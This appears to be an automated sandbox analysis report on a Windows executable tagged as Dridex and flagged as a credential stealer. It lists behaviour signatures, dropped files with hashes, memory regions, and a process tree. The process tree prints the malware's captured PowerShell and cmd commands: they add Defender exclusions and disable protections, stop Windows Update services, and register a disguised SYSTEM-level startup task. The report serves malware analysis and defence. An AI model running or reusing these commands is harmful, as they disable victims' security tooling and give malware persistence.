Overview

overview

10

Static

static

10

dridex

windows10-2004-x64

10

Analysis

  • max time kernel
    62s
  • max time network
    86s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/05/2023, 17:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e8324602f5fe73ef4f3d40d6dccea2e532e5f72a65d5dfd6a8916c628dfde5ed.exe

  • Size

    341KB

  • MD5

    6d236e9e66badd330cbf2982fe0bf9fb

  • SHA1

    2f275a5f83d8807ec0321e1e9b667271db34903f

  • SHA256

    e8324602f5fe73ef4f3d40d6dccea2e532e5f72a65d5dfd6a8916c628dfde5ed

  • SHA512

    3168daf9754fd614d8c4968bf12d9527050f0bf3aec144b6743193e19d40d023cefad88d1d7d1adebbd2f5002b5a81261189862394ffef84df33571cb0950dd8

  • SSDEEP

    6144:Lua5z4XeLqMVc2Uc1ax/QfTyuAlHKdlJP0K8ah6wu2Ai0qvF:LV5z4XPMPA/QryvodlJP0K8TOF

Score
10/10
discoveryevasionspywarestealer

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Stops running service(s) 3 TTPs
    evasion
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3136
      • C:\Users\Admin\AppData\Local\Temp\e8324602f5fe73ef4f3d40d6dccea2e532e5f72a65d5dfd6a8916c628dfde5ed.exe
        "C:\Users\Admin\AppData\Local\Temp\e8324602f5fe73ef4f3d40d6dccea2e532e5f72a65d5dfd6a8916c628dfde5ed.exe"
        2⤵
        • Checks computer location settings
        • Loads dropped DLL
        • Checks processor information in registry
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3800
        • C:\ProgramData\54226232434964334196.exe
          "C:\ProgramData\54226232434964334196.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:4820
        • C:\ProgramData\74770793516299974199.exe
          "C:\ProgramData\74770793516299974199.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4212
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe; Set-MpPreference -SubmitSamplesConsent NeverSend -PUAProtection Disabled
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4524
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4452
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
          PID:3188
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:2984
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:3196
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:4612
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:4180
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:3568
        • C:\Windows\System32\dialer.exe
          C:\Windows\System32\dialer.exe
          2⤵
            PID:2676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#awmpxda#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
            2⤵
              PID:2836

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\54226232434964334196.exe
            Filesize

            5.7MB

            MD5

            7bb8ca07a6fc374d3125f9937ad51053

            SHA1

            46370414b9938ff62fa4b7769ec7a96d7600dd92

            SHA256

            af78e7767e5de75f481ba8e49497ad1c6e43c182cc662eb6b19629e8a363ab61

            SHA512

            bc08de088d7b40439327d21a073800a37aac297641c1b129dbc5ab310850f1816f9220ae30e4466e3a1a80755de259893f3a074b9ea9914b010da34a5585c607

            Download Submit

          • C:\ProgramData\54226232434964334196.exe
            Filesize

            5.7MB

            MD5

            7bb8ca07a6fc374d3125f9937ad51053

            SHA1

            46370414b9938ff62fa4b7769ec7a96d7600dd92

            SHA256

            af78e7767e5de75f481ba8e49497ad1c6e43c182cc662eb6b19629e8a363ab61

            SHA512

            bc08de088d7b40439327d21a073800a37aac297641c1b129dbc5ab310850f1816f9220ae30e4466e3a1a80755de259893f3a074b9ea9914b010da34a5585c607

            Download Submit

          • C:\ProgramData\54226232434964334196.exe
            Filesize

            5.7MB

            MD5

            7bb8ca07a6fc374d3125f9937ad51053

            SHA1

            46370414b9938ff62fa4b7769ec7a96d7600dd92

            SHA256

            af78e7767e5de75f481ba8e49497ad1c6e43c182cc662eb6b19629e8a363ab61

            SHA512

            bc08de088d7b40439327d21a073800a37aac297641c1b129dbc5ab310850f1816f9220ae30e4466e3a1a80755de259893f3a074b9ea9914b010da34a5585c607

            Download Submit

          • C:\ProgramData\74770793516299974199.exe
            Filesize

            9.4MB

            MD5

            718d69c7e8baa9b2fea5078ac9adf6b7

            SHA1

            b409fa7ffde8cc8dbaff27ae6a51d3f599e0ed75

            SHA256

            21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936

            SHA512

            ece9d1dac93453594fee0df92f8ad9ffa14ba17d4589773eac2c6f5ae1759d4b22e1067813245d2d5ab613d2b7c45173e5aebd1e72c7a720082474b76d403515

            Download Submit

          • C:\ProgramData\74770793516299974199.exe
            Filesize

            9.4MB

            MD5

            718d69c7e8baa9b2fea5078ac9adf6b7

            SHA1

            b409fa7ffde8cc8dbaff27ae6a51d3f599e0ed75

            SHA256

            21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936

            SHA512

            ece9d1dac93453594fee0df92f8ad9ffa14ba17d4589773eac2c6f5ae1759d4b22e1067813245d2d5ab613d2b7c45173e5aebd1e72c7a720082474b76d403515

            Download Submit

          • C:\ProgramData\74770793516299974199.exe
            Filesize

            9.4MB

            MD5

            718d69c7e8baa9b2fea5078ac9adf6b7

            SHA1

            b409fa7ffde8cc8dbaff27ae6a51d3f599e0ed75

            SHA256

            21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936

            SHA512

            ece9d1dac93453594fee0df92f8ad9ffa14ba17d4589773eac2c6f5ae1759d4b22e1067813245d2d5ab613d2b7c45173e5aebd1e72c7a720082474b76d403515

            Download Submit

          • C:\ProgramData\mozglue.dll
            Filesize

            593KB

            MD5

            c8fd9be83bc728cc04beffafc2907fe9

            SHA1

            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

            SHA256

            ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

            SHA512

            fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

            Download Submit

          • C:\ProgramData\nss3.dll
            Filesize

            2.0MB

            MD5

            1cc453cdf74f31e4d913ff9c10acdde2

            SHA1

            6e85eae544d6e965f15fa5c39700fa7202f3aafe

            SHA256

            ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

            SHA512

            dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            64B

            MD5

            7472f6d3eb88a1b1bde18e9827be7433

            SHA1

            35576b99064bc9a4c95b3d12deae255eb13ba706

            SHA256

            3f06fd9e7bf04fecd2cc5ffa58bb46f202b6c3e89c2f2ec27b040fb45dfc3c40

            SHA512

            21c7641eedc5fe2084e0d1922f6af63aeac656eeda9f6f06f3db615941a675d99da759b71dbd0b77b45027850e8ae9b8109a7648d2a2763a2d697cebcc2a7f78

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            c4dcf839e50a607e9c021f077f2200d9

            SHA1

            8c2a65eb17aa8bda5c5d2d978aa8af2947b58b41

            SHA256

            e7e7c6fb92580438710f99071e1eed86218c685af8f6167a451407d53606d869

            SHA512

            4c277c5de979e7c41df5bef7329bb6d7ace8d8e1594dda5583f0f5cd4d559cc988032d7a2fc90f69c4b9d0a736b1644ee98c2a92d8de08548f7dfc86ae507737

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y4bchc1b.q2k.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • memory/316-328-0x00007FFD7D130000-0x00007FFD7D140000-memory.dmp

            Filesize

            64KB

            Download

          • memory/316-324-0x000001DFA4980000-0x000001DFA49A7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/316-344-0x000001DFA4980000-0x000001DFA49A7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/404-332-0x00000255D1B20000-0x00000255D1B47000-memory.dmp

            Filesize

            156KB

            Download

          • memory/404-334-0x00007FFD7D130000-0x00007FFD7D140000-memory.dmp

            Filesize

            64KB

            Download

          • memory/404-349-0x00000255D1B20000-0x00000255D1B47000-memory.dmp

            Filesize

            156KB

            Download

          • memory/624-314-0x0000022482C90000-0x0000022482CB7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/624-333-0x0000022482C90000-0x0000022482CB7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/624-316-0x00007FFD7D130000-0x00007FFD7D140000-memory.dmp

            Filesize

            64KB

            Download

          • memory/624-311-0x0000022482C60000-0x0000022482C81000-memory.dmp

            Filesize

            132KB

            Download

          • memory/684-329-0x000001AD92B90000-0x000001AD92BB7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/684-313-0x000001AD92B90000-0x000001AD92BB7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/684-317-0x00007FFD7D130000-0x00007FFD7D140000-memory.dmp

            Filesize

            64KB

            Download

          • memory/896-352-0x0000022BBE530000-0x0000022BBE557000-memory.dmp

            Filesize

            156KB

            Download

          • memory/896-353-0x00007FFD7D130000-0x00007FFD7D140000-memory.dmp

            Filesize

            64KB

            Download

          • memory/896-373-0x0000022BBE530000-0x0000022BBE557000-memory.dmp

            Filesize

            156KB

            Download

          • memory/960-323-0x000001A0BFB10000-0x000001A0BFB37000-memory.dmp

            Filesize

            156KB

            Download

          • memory/960-327-0x00007FFD7D130000-0x00007FFD7D140000-memory.dmp

            Filesize

            64KB

            Download

          • memory/960-339-0x000001A0BFB10000-0x000001A0BFB37000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1080-360-0x00007FFD7D130000-0x00007FFD7D140000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1080-357-0x00000253F3B60000-0x00000253F3B87000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1080-374-0x00000253F3B60000-0x00000253F3B87000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1088-375-0x0000015B96660000-0x0000015B96687000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1088-364-0x00007FFD7D130000-0x00007FFD7D140000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1088-362-0x0000015B96660000-0x0000015B96687000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1100-365-0x00007FFD7D130000-0x00007FFD7D140000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1100-363-0x000001E7189A0000-0x000001E7189C7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1100-376-0x000001E7189A0000-0x000001E7189C7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1168-370-0x00007FFD7D130000-0x00007FFD7D140000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1168-369-0x0000023E8D2B0000-0x0000023E8D2D7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1168-377-0x0000023E8D2B0000-0x0000023E8D2D7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1244-411-0x0000025CBFF80000-0x0000025CBFFA7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1276-417-0x00000213DF790000-0x00000213DF7B7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1284-423-0x00000251B3630000-0x00000251B3657000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1384-428-0x00000116B92C0000-0x00000116B92E7000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1448-433-0x00000228A9340000-0x00000228A9367000-memory.dmp

            Filesize

            156KB

            Download

          • memory/1500-444-0x0000012684A00000-0x0000012684A27000-memory.dmp

            Filesize

            156KB

            Download

          • memory/2676-322-0x00007FF715EE0000-0x00007FF715F09000-memory.dmp

            Filesize

            164KB

            Download

          • memory/2676-309-0x00007FFDBBE90000-0x00007FFDBBF4E000-memory.dmp

            Filesize

            760KB

            Download

          • memory/2676-308-0x00007FFDBD0B0000-0x00007FFDBD2A5000-memory.dmp

            Filesize

            2.0MB

            Download

          • memory/2836-335-0x00000208CD170000-0x00000208CD180000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2836-337-0x00000208CD170000-0x00000208CD180000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3800-144-0x0000000061E00000-0x0000000061EF3000-memory.dmp

            Filesize

            972KB

            Download

          • memory/4212-372-0x0000000000060000-0x00000000009C9000-memory.dmp

            Filesize

            9.4MB

            Download

          • memory/4212-250-0x0000000000060000-0x00000000009C9000-memory.dmp

            Filesize

            9.4MB

            Download

          • memory/4452-297-0x0000021361F60000-0x0000021361F82000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4452-298-0x0000021361FC0000-0x0000021361FD0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4452-299-0x0000021361FC0000-0x0000021361FD0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4524-269-0x0000000006890000-0x00000000068C2000-memory.dmp

            Filesize

            200KB

            Download

          • memory/4524-281-0x0000000004F10000-0x0000000004F20000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4524-256-0x00000000053F0000-0x0000000005412000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4524-257-0x0000000005BF0000-0x0000000005C56000-memory.dmp

            Filesize

            408KB

            Download

          • memory/4524-258-0x0000000005C60000-0x0000000005CC6000-memory.dmp

            Filesize

            408KB

            Download

          • memory/4524-285-0x0000000007630000-0x000000000763A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/4524-268-0x00000000062C0000-0x00000000062DE000-memory.dmp

            Filesize

            120KB

            Download

          • memory/4524-286-0x0000000007840000-0x00000000078D6000-memory.dmp

            Filesize

            600KB

            Download

          • memory/4524-270-0x0000000074100000-0x000000007414C000-memory.dmp

            Filesize

            304KB

            Download

          • memory/4524-280-0x0000000006870000-0x000000000688E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/4524-251-0x0000000002990000-0x00000000029C6000-memory.dmp

            Filesize

            216KB

            Download

          • memory/4524-255-0x0000000004F10000-0x0000000004F20000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4524-282-0x000000007FAC0000-0x000000007FAD0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4524-283-0x0000000007C70000-0x00000000082EA000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/4524-301-0x00000000078E0000-0x00000000078E8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/4524-300-0x0000000007900000-0x000000000791A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/4524-252-0x0000000005550000-0x0000000005B78000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/4524-254-0x0000000004F10000-0x0000000004F20000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4524-284-0x00000000075C0000-0x00000000075DA000-memory.dmp

            Filesize

            104KB

            Download

          • memory/4524-287-0x0000000007800000-0x000000000780E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/4820-253-0x00007FF7E17C0000-0x00007FF7E1D7E000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/4820-318-0x00007FF7E17C0000-0x00007FF7E1D7E000-memory.dmp

            Filesize

            5.7MB

            Download